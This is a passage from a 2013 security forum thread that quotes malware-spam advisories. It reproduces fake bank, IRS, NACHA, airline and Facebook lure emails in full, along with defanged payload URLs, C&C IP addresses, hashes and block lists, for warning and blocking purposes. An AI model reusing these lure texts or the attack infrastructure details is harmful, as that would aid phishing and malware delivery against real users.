- http://www.hotforsecurity.com/blog/spammed-malware-campaign-targets-citi-group-customers-5322.html
Feb 11, 2013 - "... it’s time Citi clients keep an eye open for e-mails that read “You have received a secure message” inviting them to read the message by opening the attachments securedoc .html...
> http://www.hotforsecurity.com/wp-content/uploads/2013/02/Spammed-Malware-Campaign-Targets-Citi-Group-Customers.png
The emails include a link and an attachment. While the link is harmless, taking receivers to the legitimate Citi page, the attachment is a password stealer that opens a backdoor for remote attackers. Some instances appear to also download components of the BlackHole or ZeuS exploit kits. Untrained eyes could fall for this trick, since these e-mails are written in good English, with decent grammar and harmless-looking attachments. Of the countless ways of infecting a computer, spam delivering malware continues to pay off despite restless efforts of media and the security community. Infecting PCs via spam proves an efficient dissemination method, since users are still caught off-guard by malicious links or attachments such as this message addressed to Citi Group clients..."
___
Fake British Airways SPAM / epianokif .ru
- http://blog.dynamoo.com/2013/02/british-airways-spam-epianokifru.html
11 Feb 2013 - "This fake British Airways spam leads to malware on epianokif .ru:
Date: Mon, 11 Feb 2013 11:30:39 +0330
From: JamesTieszen @[victimdomain .com]
Subject: British Airways E-ticket receipts
Attachments: E-Ticket-N234922XM .htm
e-ticket receipt
Booking reference: DZ87548418
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 74665737. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
The malicious payload is at [donotclick]epianokif .ru:8080/forum/links/column.php (report here) hosted on:
82.148.98.36 (Qatar Telecom, Qatar)
195.210.47.208 (PS Internet Company, Kazakhstan)
202.72.245.146 (Railcom, Mongolia) ..."
___
Fake NACHA SPAM / albaperu .net
- http://blog.dynamoo.com/2013/02/nacha-spam-albaperunet.html
11 Feb 2013 - "This fake NACHA spam leads to malware on albaperu .net:
Date: Mon, 11 Feb 2013 11:39:03 -0500 [11:39:03 EST]
From: ACH Network [reproachedwp41 @direct.nacha .org]
Subject: ACH Transfer canceled
Aborted transfer
The ACH process (ID: 838907191379), recently initiated from your checking account (by one of your account members), was reversed by the other financial institution.
Transaction ID: 838907191379
Reason of Cancellation See detailed information in the despatch below
Transaction Detailed Report RP838907191379.doc (Microsoft Word Document)
13150 Sunrise Drive, Suite 100 Herndon, VA 20172 (703) 561-1600
2013 NACHA - The Electronic Payments Association
The malicious payload is at [donotclick]albaperu .net/detects/case_offices.php (report here) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US)..."
___
Something evil on 46.165.206.16
- http://blog.dynamoo.com/2013/02/something-evil-on-4616520616.html
11 Feb 2013 - "This is a little group of fake analytics sites containing malware (for example*), hosted on 46.165.206.16 (Leaseweb, Germany**). Sites listed in -red- have already been tagged by Google Safe Browsing diagnostics, presumably the others have stayed below the radar.
adstat150 .com
cexstat20 .com
katestat77 .us
kmstat505 .us
kmstat515 .us
kmstat530 .com
lmstat450 .com
mptraf11 .info
mptraf2 .info
mxstat205 .us
mxstat570 .com
mxstat740 .com
mxstat760 .com
rxtraf25 .ru
rxtraf26 .ru
skeltds .us
vmstat100 .com
vmstat120 .com
vmstat140 .com
vmstat210 .com
vmstat230 .com
vmstat320 .com ..."
* http://urlquery.net/report.php?id=738388
Diagnostic page for AS16265 (LEASEWEB)
** https://www.google.com/safebrowsing/diagnostic?site=AS:16265
"... over the past 90 days, 3350 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-02-12, and the last time suspicious content was found was on 2013-02-12... we found 1006 site(s) on this network... that appeared to function as intermediaries for the infection of 3958 other site(s)... We found 1567 site(s)... that infected 6879 other site(s)..."
:fear::mad:
AplusWebMaster
2013-02-12, 23:22
FYI...
Fake IRS SPAM / micropowerboating .net
- http://blog.dynamoo.com/2013/02/changelog-spam-emaianemru.html
12 Feb 2013 - "This fake IRS spam leads to malware on micropowerboating .net:
Date: Tue, 12 Feb 2013 22:06:55 +0800
From: Internal Revenue Service [damonfq43 @taxes.irs .gov]
Subject: Income Tax Refund TURNED DOWN
Hereby we have to note that Your State Tax Refund Appeal ({ID: 796839212518), recently has been RETURNED. If you believe that IRS did not properly estimate your case due to misunderstanding of the fact(s), be prepared to serve additional information. You can obtain refusal to accept details and re-submit your appeal by browsing a link below.
Please enter official website for information
Internal Revemue Service
Internal Revenue Services United States, Department of Treasury
9611 Tellus. Av.
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
===
Date: Tue, 12 Feb 2013 15:00:35 +0100
From: Internal Revenue Service [zirconiumiag0 @irs .gov]
Subject: Income Tax Refund NOT ACCEPTED
Hereby we hav to inform that Your Income Tax Refund Appeal ({ID: 46303803645929), recently has been CANCELED. If you believe that IRS did not properly estimate your case due to misapprehension of the fact(s), be prepared to equip additional information. You can obtain non-acceptance details and re-submit your appeal by browsing a link below.
Please browse official site for more information
Internal Revemue Service
Internal Revenue Services United States, Department of Treasury
3192 Aliquam Rd.
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
===
Date: Tue, 12 Feb 2013 15:13:37 +0100 [09:13:37 EST]
From: Internal Revenue Service [idealizesmtz @informer.irs .gov]
Subject: Income Tax Refund TURNED DOWN
Hereby You notified that Your Income Tax Outstanding transaction Appeal (No: 8984589927661), recently was CANCELED. If you believe that IRS did not properly estimate your case due to misapprehension of the fact(s), be prepared to deliver additional information. You can obtain refusal of acceptance details and re-submit your appeal by using a link below.
Please enter official site for information
Internal Revemue Service
Internal Revenue Services United States, Department of Treasury
P.O. Box 265
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
The malicious payload is on [donotclick]micropowerboating .net/detects/pending_details.php (report here) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US)
The following IPs and domains should be blocked:
175.121.229.209
198.144.191.50
micropowerboating .net
morepowetradersta .com
asistyapipressta .com
uminteraktifcozumler .com
rebelldagsanet .com
madcambodia .net
acctnmrxm .net
capeinn .net
albaperu .net
live-satellite-view .net ..."
___
Fake Changelog SPAM / emaianem .ru
- http://blog.dynamoo.com/2013/02/changelog-spam-emaianemru.html
12 Feb 2013 - "This changelog spam leads to malware on emaianem .ru:
Date: Tue, 12 Feb 2013 09:11:11 +0200
From: LinkedIn Password [password@linkedin.com]
Subject: Re: Changlog 10.2011
Good day,
changelog update - View
L. KIRKLAND
===
Date: Tue, 12 Feb 2013 05:14:54 -0600
From: LinkedIn [welcome @linkedin .com]
Subject: Fwd: Re: Changelog as promised(updated)
Good morning,
as prmised updated changelog - View
L. AGUILAR
The malicious payload is at [donotclick]emaianem .ru:8080/forum/links/column.php and is hosted on the same servers as found here*."
* http://blog.dynamoo.com/2013/02/efax-spam-estipaindoru.html
46.175.224.21 (Maxnet Lukasz Hamerski, Poland)
91.121.57.231 (OVH, France)
202.72.245.146 (Railcom, Mongolia)
___
Something evil on 192.81.129.219
- http://blog.dynamoo.com/2013/02/something-evil-on-19281129219.html
12 Feb 2013 - "It looks like there's a nasty case of the Blackhole Exploit kit on 192.81.129.219 (see example*). The IP is controlled by Linode in the US who have been a bit quiet recently... active domains that I can identify on this IP..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=986474
:fear ::mad:
AplusWebMaster
2013-02-13, 16:50
FYI...
Fake NACHA SPAM / thedigidares .net
- http://blog.dynamoo.com/2013/02/nacha-spam-thedigidaresnet.html
13 Feb 2013 - "This fake NACHA spam leads to malware on thedigidares .net:
Date: Wed, 13 Feb 2013 12:10:27 +0000
From: " NACHA" [limbon@direct .nacha .org]
Subject: Aborted transfer
Canceled transaction
The ACH process (ID: 648919687408), recently sent from your bank account (by you), was canceled by the other financial institution.
Transaction ID: 648919687408
Cancellation Reason Review additional info in the statement below
Transaction Detailed Report Report_648919687408.xls (Microsoft/Open Office Word Document)
13150 Sunrise Street, Suite 100 Herndon, VA 20174 (703) 561-1200
2013 NACHA - The Electronic Payments Association
The malicious payload is at [donotclick]thedigidares .net/detects/irritating-crashed-registers.php (report here*) hosted on:
134.74.14.98 (City College of New York, US)
175.121.229.209 (Hanaro Telecom, Korea)
The following IPs and domains are linked and should be blocked:
134.74.14.98
175.121.229.209
albaperu .net
capeinn .net
thedigidares .net
madcambodia .net
micropowerboating .net
dressaytam .net
acctnmrxm .net
albaperu .net
live-satellite-view .net
dressaytam .net "
* http://urlquery.net/report.php?id=993904
BlackHole v2.0 exploit kit
- http://blog.dynamoo.com/2013/02/nacha-spam-eminakotprru.html
13 Feb 2013 - "More fake NACHA spam, this time leading to malware on eminakotpr .ru:
Date: Wed, 13 Feb 2013 05:24:26 +0530
From: "ACH Network" [risk-management@nacha.org]
Subject: Re: Fwd: ACH Transfer rejected
The ACH transaction, initiated from your checking acc., was canceled.
Canceled transfer:
Transfer ID: FE-65426265630US
Transaction Report: View
August BLUE
NACHA - The National Automated Clearing House Association
The malicious payload is at [donotclick]eminakotpr .ru:8080/forum/links/column.php hosted on:
46.175.224.21 (MAXNET Lukasz Hamerski, Poland)
91.121.57.231 (OVH, France)
202.72.245.146 (Railcom, Mongolia)..."
___
Malware sites to block 13/2/13
- http://blog.dynamoo.com/2013/02/malware-sites-to-block-13213.html
13 Feb 2013 - "These malicious sites appear to be part of a Waledac botnet. I haven't had much time to analyse what exactly what it going on, but here is one example from [donotclick]merwiqca .ru/nothing.exe: URLquery, VirusTotal*, Comodo CAMAS, ThreatExpert**.
I'm still working on IP addresses (there are a LOT), but these are the domains that I have managed to identify.."
(Long list [mostly *.ru] at the dynamoo URL above.)
* https://www.virustotal.com/file/a604fb2d0eb7e6a3b637240cd9bc3902756305bed9d474072f6d83e20d1786dd/analysis/1360769367/
File name: khgkg01.exe
Detection ratio: 8/43
Analysis date: 2013-02-13
Behavioural information
TCP connections...
85.121.3.1:80
76.169.151.26:80
195.228.43.24:80
46.162.243.26:80
** http://www.threatexpert.com/report.aspx?md5=100467dc5e2b345030988293dffbdc9a
192.5.5.241
___
- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
Fake CashPro Online Digital Certificate Notification E-mail Messages - February 13, 2013
Fake Failed Package Delivery Notification E-mail Messages - February 13, 2013
Fake Message Receipt Notification E-mail Messages - February 13, 2013
Fake Western Union Money Transfer Transaction E-Mail Messages - February 13, 2013
Fake Payment Request E-mail Messages - February 13, 2013
Fake Voicemail Message Notification E-mail Messages - February 13, 2013
Fake Turkish Airline Ticket Booking Confirmation E-mail Messages - February 13, 2013
Fake Antiphishing Notification E-mail Messages - February 13, 2013
Fake Bank Transfer Confirmation Notification E-mail Messages - February 13, 2013
Fake Product Order Change Notification E-mail Messages - February 13, 2013
Fake Italian Policy Change Notification E-mail Messages - February 13, 2013
Fake United Parcel Service Shipment Error E-mail Messages - February 13, 2013
(Links and more info available at the cisco URL above.)
___
Fake Bank "Secure Email Notification" SPAM
- http://blog.dynamoo.com/2013/02/first-foundation-bank-secure-email.html
13 Feb 2013 - "It looks a bit like a phish, but this "First Foundation Bank Secure Email Notification" spam has a ZIP file that leads to malware:
Date: Wed, 13 Feb 2013 20:08:46 +0200 [13:08:46 EST]
From: FF-inc Secure Notification [secure.notification @ff-inc .com]
Subject: First Foundation Bank Secure Email Notification - 94JIMEEQ
You have received a secure message
Read your secure message by opening the attachment, secure_mail_94JIMEEQ. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser. To access from a mobile device, forward this message to mobile @res.ff-inc .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.795.7643.
2000-2013 First Foundation Inc. All rights reserved.
Attached is a file called secure_mail_94JIMEEQ.zip which expands into.. well, nothing good.. a file called secure_mail_{_Case_DIG}.exe with an icon that is meant to disguise it as an Acrobat file. VirusTotal detection rates* are just 15/45 and the malware is resistant to analysis. Incidentally, emailing mobile @res.ff-inc .com just generates a failure message. Avoid."
* https://www.virustotal.com/file/71b8e44b1e4b05c267d8c7af8f8f6a1294f33cbeb0b202731dde9a67389faa35/analysis/1360795797/
File name: secure_mail_{_Case_DIG}.exe
Detection ratio: 15/45
Analysis date: 2013-02-13
:mad:
AplusWebMaster
2013-02-14, 14:40
FYI...
Something evil on 92.63.105.23
- http://blog.dynamoo.com/2013/02/something-evil-on-926310523.html
14 Feb 2013 - "Looks like a nasty infestion of Blackhole is lurking on 92.63.105.23 (TheFirst-RU, Russia*) - see an example of the nastiness here** (this link is safe to click!). The following domains are present on this address, although there are probably more..."
(Long list at the dynamoo URL above.)
** http://urlquery.net/report.php?id=995495
... Blackholev2 url structure detected
* https://www.google.com/safebrowsing/diagnostic?site=AS:29182
"... over the past 90 days, 606 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-02-14, and the last time suspicious content was found was on 2013-02-14... we found 182 site(s) on this network... that appeared to function as intermediaries for the infection of 652 other site(s)... We found 655 site(s)... that infected 4547 other site(s)..."
___
Top 10 Valentine’s Day Scams...
- http://www.hotforsecurity.com/blog/top-10-valentines-day-scams-cyber-criminals-trick-users-with-fake-limousine-offers-and-online-heart-experts-5357.html
Feb 14, 2013 - "... advises users to stay away from fake limousine offers and online ‘heart experts’ who claim to heal troubled relationships. This type of scam spreads through spam and redirects users to phishing, fraud and malware-infected websites... The bait that tricks men these days includes fake chocolate offers, diamond-like rings, perfumes, personalized gifts, heart-shaped jewelry and replica watches... A fast spreading scam tricks victims to download Valentine’s Day wallpapers which redirect to fraudulent websites. Users are told they won an iPhone 5 and asked for personal details. In the name of Cupid, similar scams circulate on Facebook, too. Valentine’s Day games and Android apps downloaded from unofficial marketplaces such as free love calculators may install adware and malware. Britons should be especially careful with flower offers. Valentine’s Day is not only the busiest day of the year for UK florists, but also for fake ‘flower’ scammers..."
> http://www.hotforsecurity.com/wp-content/uploads/2013/02/top-10-valentines-day-scams-cyber-criminals-trick-users-with-fake-limousine-offers-and-online-heart-experts-1.jpg
___
Malicious URL hits related to “valentine” from January to Feb. 14
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/02/Malicious-URLs-2013.png
Malware detections related to “valentine” from January to Feb. 14
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/02/Malware-Valentines-2013.png
___
Fake 'Facebook blocked' emails serve client-side exploits and malware
- http://blog.webroot.com/2013/02/14/fake-youve-blockeddisabled-your-facebook-account-themed-emails-serve-client-side-exploits-and-malware/
14 Feb 2013 - "Cybercriminals are currently spamvertising two separate campaigns, impersonating Facebook Inc., in an attempt to trick its users into thinking that their Facebook account has been disabled. What these two campaigns have in common is the fact that the client-side exploits serving domains are both parked on the same IP. Once users click on -any- of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised campaign:
> https://webrootblog.files.wordpress.com/2013/02/email_spam_facebook_account_blocked_disabled_exploits_malware_black_hole_exploit_kit.png
... Malicious domain names reconnaissance:
gonita .net – 222.238.109.66 – Email: lockwr @rocketmail .com
able-stock .net – 222.238.109.66
capeinn .net – 222.238.109.66; 198.144.191.50 – Email: softonlines @yahoo .com
Name servers used in the campaign:
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
We’ve already seen the same name servers used in... malicious campaigns...
Responding to 222.238.109.66 are... malicious/fraudulent domains...
Responding to 198.144.191.50 are... malicious domains...
We’ve already seen the same pseudo-randm C&C communication characters (EGa+AAAAAA), as well as the same C&C server (173.201.177.77) in... previously profiled campaigns..."
(More detail at the webroot URL above.)
___
Fake HP ScanJet SPAM / eipuonam .ru
- http://blog.dynamoo.com/2013/02/hp-scanjet-spam-eipuonamru.html
14 Feb 2013 - "This fake printer spam leads to malware on eipuonam .ru:
Date: Thu, 14 Feb 2013 -02:00:50 -0800
From: "Xanga" [noreply@xanga.com]
Subject: Fwd: Scan from a HP ScanJet #72551
Attachments: HP_Document.htm
Attached document was scanned and sent
to you using a HP A-39329P.
SENT BY : Ingrid
PAGES : 0
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
The attachment HP_Document.htm contains a script that attempts to direct visitors to [donotclick]eipuonam .ru:8080/forum/links/column.php (report here*) hosted on:
91.121.57.231 (OVH, France)
195.210.47.208 (PS Internet, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1000763
... Detected suspicious URL pattern
___
Fake "Copies of policies" SPAM / ewinhdutik .ru
- http://blog.dynamoo.com/2013/02/copies-of-policies-spam-ewinhdutikru.html
14 Feb 2013 - "This spam leads to malware on ewinhdutik .ru:
Date: Thu, 14 Feb 2013 07:16:28 -0500
From: "Korbin BERG" [ConnorAlmeida @telia .com]
Subject: RE: Korbin - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Korbin BERG,
===
Date: Thu, 14 Feb 2013 03:30:52 +0530
From: Tagged [Tagged @taggedmail .com]
Subject: RE: KESHIA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
KESHIA LEVINE,
The malicious payload is at [donotclick]ewinhdutik .ru:8080/forum/links/column.php (report here*) hosted on the same IP addresses as this attack we saw earlier:
- http://blog.dynamoo.com/2013/02/hp-scanjet-spam-eipuonamru.html
91.121.57.231 (OVH, France)
195.210.47.208 (PS Internet, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)"
* http://urlquery.net/report.php?id=1001864
... AS48716** Kazakhstan... suspicious URL pattern
** https://www.google.com/safebrowsing/diagnostic?site=AS:48716
___
Fake HP ScanJet SPAM / 202.72.245.146
- http://blog.dynamoo.com/2013/02/hp-scanjet-spam-20272245146.html
14 Feb 2013 - "This fake printer spam leads to malware on 202.72.245.146:
Date: Thu, 14 Feb 2013 10:10:56 +0000
From: AntonioShapard @hotmail .com
Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #6293
Attachments: HP_Document.htm
Attached document was scanned and sent
to you using a HP A-32347P.
SENT BY : TRISH
PAGES : 3
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
===
Date: Thu, 14 Feb 2013 06:07:00 -0800
From: LinkedIn Password [password @linkedin .com]
Subject: Fwd: Scan from a Hewlett-Packard ScanJet 83097855
Attachments: HP_Document.htm
Attached document was scanned and sent
to you using a HP A-775861P.
SENT BY : CARLINE
PAGES : 4
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
The malicious payload is on [donotclick]202.72.245.146 :8080/forum/links/column.php which is a familiar IP address belonging to Railcom in Mongolia. The following malicious websites are also active on the same server..."
(Long list at the dynamoo URL above.)
___
Fake Intuit SPAM / epionkalom .ru
- http://blog.dynamoo.com/2013/02/intuit-spam-epionkalomru.html
14 Feb 2013 - "This fake Intuit spam leads to malware on epionkalom .ru:
Date: Thu, 14 Feb 2013 09:05:48 -0500
From: "Classmates . com" [classmatesemail @accounts.classmates .com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Thu, 14 Feb 2013 09:05:48 -0500.
Finances would be gone away from below account # ending in 2317 on Thu, 14 Feb 2013 09:05:48 -0500
amount to be seceded: 2246 USD
Paychecks would be procrastinated to your personnel accounts on: Thu, 14 Feb 2013 09:05:48 -0500
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]epionkalom .ru:8080/forum/links/column.php hosted on a bunch of IP addresses that we have seen many, many times before:
91.121.57.231 (OVH, France)
195.210.47.208 (PS Internet, Kazakhstan)
202.72.245.146 (Railcom, Mongolia) ..."
___
Fake 'TurboTax State Return Rejected' SPAM
- http://security.intuit.com/alert.php?a=72
2/14/13 - "People are receiving fake emails with the title 'TurboTax State Return Rejected'. Below is a copy of the email people are receiving. The email does not contain a link; however, the email has a .zip attachment that contains malware. Do not open the .zip file.
> http://security.intuit.com/images/turbotaxstate.jpg
This is the end of the fake email..."
:mad::mad:
AplusWebMaster
2013-02-15, 13:36
FYI...
Fake IRS emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/02/15/spamvertised-irs-income-tax-refund-turned-down-themed-emails-lead-to-black-hole-exploit-kit/
Feb 15, 2013 - "Its tax season and cybercriminals are mass mailing tens of thousands of IRS (Internal Revenue Service) themed emails in an attempt to trick users into thinking that their income tax refund has been “turned down”. Once users click on any of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/irs_income_tax_appeal_spam_email_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
micropowerboating .net – 175.121.229.209; 198.144.191.50 – Email: dooronemars @aol .com
Name Server: NS1.POOPHANAM .NET – 31.170.106.17
Name Server: NS2.POOPHANAM .NET – 65.135.199.21
The following malicious domains also respond to the same IPs (175.121.229.209; 198.144.191.50) and are part of the campaign’s infrastructure...
Although the initial client-side exploits serving domain used in the campaign (micropowerboating .net) was down when we attempted to reproduce its malicious payload, we managed to reproduce the malicious payload for a different domain parked at the same IP (175.121.229.209), namely, madcambodia .net.
Detection rate for the dropped malware:
madcambodia .net – 175.121.229.209 – MD5: * ... Trojan-Spy.Win32.Zbot.ivkf.
Once executed, the sample also phones back to the following C&C (command and control) servers: 94.68.61.135 :14511, 99.76.3.38 :11350
We also got another MD5 phoning back to the same IP..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/d83dad0125948b0c20016f98dae6248dd2d96d03be83b3bbcb0627715ea19a70/analysis/
File name: 2da28ae0df7a90ce89c7c43878927a9f
Detection ratio: 23/45
Analysis date: 2013-02-10 05
___
Malware sites to block 15/2/13
- http://blog.dynamoo.com/2013/02/malware-sites-to-block-15313.html
15 Feb 2013 - "A set of malware sites.. or I think two sets of malware sites that you might want to block. The .ru domains are connected with this botnet, a second set of sites seem to be something else malicious. Both groups of sites are connected by a server at 142.0.45.27 (Volumedrive, US**) which may be a C&C server. Interested parties might want to poke at the server a bit.. As a bonus, these are the IPs* that I can find connected with the .ru botnet that I have collected over the past few days. Some of them are dynamic, but it might be a starting point if anyone wants to poke at that botnet a bit more..."
* http://www.dynamoo.com/files/botnet-feb-13.txt
** https://www.google.com/safebrowsing/diagnostic?site=AS:46664
___
Fake IRS SPAM / azsocseclawyer .net
- http://blog.dynamoo.com/2013/02/cum-avenue-irs-spam-azsocseclawyernet.html
15 Feb 2013 - "This fake IRS spam (from an office on "Cum Avenue"!) actually leads to malware on azsocseclawyer .net:
Date: Fri, 15 Feb 2013 09:47:25 -0500
From: Internal Revenue Service [ahabfya196 @etax.irs .gov]
Subject: pecuniary penalty for delay of tax return filling
Herewith we are informing you that you are required to pay a surcharge for not filling the income tax return prior to January 31.
Please note that IRS Section 7117-F-8 specifies a money penalty of $2.000 for each Form 479 that is filled later than deadline for filling the income tax return or does not contain the exhaustive information described in 7117-F-8.
You will be released from the pecuniary penalty when the taxpayer shows that the failure to file was caused by substantial reason.
Please visit official website for more information
Internal Revenue Services United States, Department of Treasury
Ap #822-9450 Cum Avenue
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
The malicious payload is at [donotclick]azsocseclawyer .net/detects/necessary_documenting_broadcasts-sensitive.php (report here*) hosted on:
77.241.192.47 (VPSNET, Lithunia)
175.121.229.209 (Hanaro Telecom, Korea)..."
* http://urlquery.net/report.php?id=1009373
... BlackHole v2.0 exploit kit
___
Fake Wire transfer SPAM / 202.72.245.146
- http://blog.dynamoo.com/2013/02/wire-transfer-spam-20272245146.html
15 Feb 2013 - "This fake wire transfer spam leads to malware on 202.72.245.146:
Date: Fri, 15 Feb 2013 07:24:40 -0500
From: Tasha Rosenthal via LinkedIn [member @linkedin .com]
Subject: RE: Wire transfer cancelled
Good day,
Wire Transfer was canceled by the other bank.
Canceled transaction:
FED NR: 94813904RE5666838
Transfer Report: View
The Federal Reserve Wire Network
The malicious payload is on [donotclick]202.72.245.146 :8080/forum/links/public_version.php (Railcom, Mongolia) (report here) which is a well-known malicious IP that you should definitely block if you can.
Update: there is also a "Scan from a HP ScanJet #841548" spam for the same IP, sending victims to [donotclick]202.72.245.146 :8080/forum/links/column.php..."
:mad::fear::fear:
AplusWebMaster
2013-02-18, 14:06
FYI...
Facebook Wall posts malware propagations ...
- http://blog.webroot.com/2013/02/18/malware-propagates-through-localized-facebook-wall-posts/
Feb 18, 2013 - "We’ve recently intercepted a localized — to Bulgarian — malware campaign, that’s propagating through Facebook Wall posts. Basically, a malware-infected user would unknowingly post a link+enticing message, in this case “Check it out!“, on their friend’s Walls, in an attempt to abuse their trusted relationship and provoke them to click on the malicious link. Once users click on the link, they’re exposed to the malicious software...
Sample screenshot of the propagation in action:
> https://webrootblog.files.wordpress.com/2013/02/facebook_wall_spam_malware_links.png
Sample spamvertised URL appearing on Facebook users’ Walls:
hxxp ://0845 .com/fk7u
Sample redirection chain:
hxxp ://0845 .com/fk7u -> hxxp ://connectiveinnovations .com/mandolin.html?excavator=kmlumm -> hxxp ://91.218.38.245 /imagedl11.php
Sample detection rates for the malicious executables participating in the campaign:
hxxp ://91.218.38.245 /imagedl11.php – MD5: 1ad434025cd1fb681597db80447290e4 * ... Backdoor:Win32/Tofsee.F ...
Responding to this IP (91.218.38.245, AS197145 Infium Ltd.) are also... malicious/fraudulent domains...
More MD5s are known to have phoned back to 91.218.38.245:
MD5: 20057f1155515dd3a37afde0b459b2cf
MD5: 665419c0e458883122a790f260115ada
MD5: 1ea373c41eabd0ad3787039dd0927525
MD5: f3472ec713d3ab2e255091194e4dccaa
MD5: 4d54a2c022dad057f8e44701d52fec6b
MD5: 6807409c44a4a9c83ce67abc3d5fe982
As well as related MD5s phoning back to 185.4.227.76:
MD5: 6b1e671746373a5d95e55d17edec5623
MD5: 377c2e63ff3fd6f5fdd93ff27c8216fe
MD5: 2D4C5B95321C5A9051874CEE9C9E9CDC
MD5: 3f9df3fd39778b1a856dedebf8f39654
MD5: 82e2672c2ca1b3200d234c6c419fc83a
MD5: 796967255c8b99640d281e89e3ffe673
MD5: bc1883b07b47423bd30645e54db4775c
MD5: e6f081d2c5a3608fad9b2294f1cb6762
What’s special about the second C&C phone back IP (185.4.227.76) is that it was used in another Facebook themed malware campaign back in December, 2012, indicating that this cybercriminal/group of cybercriminals are actively impersonating Facebook Inc. for malicious and fraudulent purposes..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/ca53e5fb3ad6c53e7a2b7e0e711fde8c471a2296abe00cdb8db8e67e14075947/analysis/
File name: Dionis
Detection ratio: 31/45
Analysis date: 2013-02-15
AS197145 Infium
- https://www.google.com/safebrowsing/diagnostic?site=AS:197145
:mad::fear:
AplusWebMaster
2013-02-19, 13:43
FYI...
Fake Wire Transfer emails serve client-side exploits and malware
- http://blog.webroot.com/2013/02/19/malicious-re-your-wire-transfer-themed-emails-serve-client-side-exploits-and-malware/
Feb 19, 2013 - "... a persistent attempt to infect tens of thousands of users with malware through a systematic rotation of multiple social engineering themes... they all share the same malicious infrastructure. Let’s profile one of the most recently spamvertised campaigns, and expose the cybercriminals’ complete portfolio of malicious domains, their related name servers, dropped MD5 and its associated run time behavior...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/email_spam_malware_exploits_wire_transfer_fake_black_hole_exploit_kit.png
Sample spamvertised compromised URLs:
hxxp://2555.ruksadindan .com/page-329.htm
hxxp://www.athenassoftware .com.br/page-329.htm
hxxp://www.sweetgarden .ca/page-329.htm
hxxp://lab.monohrom .uz/page-329.htm
hxxp://easy2winpoker .com/page-329.htm
hxxp://ideashtor .ru/page-329.htm
Sample client-side exploits serving URL:
hxxp:// 202.72.245.146 :8080/forum/links/public_version.php
... malicious domains also respond to the same IP (202.72.245.146) and are part of multiple campaigns spamvertised over the past couple of days...
(Long list available at the webroot URL above.)...
Sample malicious payload dropping URL:
hxxp:// 202.72.245.146 :8080/forum/links/public_version.php?mmltejvt=1g:2v:33:2v:2w&pstvw=3d&xrej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&vczaspnq=1n:1d:1f:1d:1f:1d:1j:1k:1l
Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: 04e9d4167c9a1b82e622e04ad85f8e99 * ... Trojan.Win32.Yakes.cdxy.
Once executed, the sample creates... Registry Keys... And modifies them..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/en/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/
File name: contacts.exe
Detection ratio: 33/46
Analysis date: 2013-02-18
___
